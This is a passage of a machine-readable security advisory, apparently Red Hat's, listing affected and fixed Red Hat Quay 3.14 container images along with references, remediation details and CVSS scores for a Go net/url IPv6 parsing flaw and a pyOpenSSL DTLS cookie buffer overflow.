          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-25679"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445356",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/752180",
          "url": "https://go.dev/cl/752180"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/77578",
          "url": "https://go.dev/issue/77578"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk",
          "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4601",
          "url": "https://pkg.go.dev/vuln/GO-2026-4601"
        }
      ],
      "release_date": "2026-03-06T21:28:14.211000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"
    },
    {
      "cve": "CVE-2026-27459",
      "cwe": {
        "id": "CWE-120",
        "name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
      },
      "discovery_date": "2026-03-18T00:01:41.404915+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2448503"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in pyOpenSSL. The set_cookie_generate_callback callback function can be used to generate DTLS cookies. When the callback returns a cookie string or byte sequence longer than 256 bytes, a buffer overflow can be triggered due to a missing bounds checking before copying the data to a fixed-size buffer provided by the underlying OpenSSL library.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "pyOpenSSL: DTLS cookie callback buffer overflow",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This flaw is only exploitable when an application using the pyOpenSSL library provides a custom callback to the set_cookie_generate_callback function. For the buffer overflow to occur, the callback function must return a cookie string or byte sequence longer than 256 bytes, limiting the exposure of this issue. Due to these reasons, this vulnerability has been rated with an important severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "RHBZ#2448503",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448503"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27459",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27459",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27459"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/blob/358cbf29c4e364c59930e53a270116249581eaa3/CHANGELOG.rst",
          "url": "https://github.com/pyca/pyopenssl/blob/358cbf29c4e364c59930e53a270116249581eaa3/CHANGELOG.rst"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/commit/57f09bb4bb051d3bc2a1abd36e9525313d5cd408",
          "url": "https://github.com/pyca/pyopenssl/commit/57f09bb4bb051d3bc2a1abd36e9525313d5cd408"
        },
        {
          "category": "external",
          "summary": "https://github.com/pyca/pyopenssl/security/advisories/GHSA-5pwr-322w-8jr4",
          "url": "https://github.com/pyca/pyopenssl/security/advisories/GHSA-5pwr-322w-8jr4"
        }
      ],
      "release_date": "2026-03-17T23:34:28.483000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
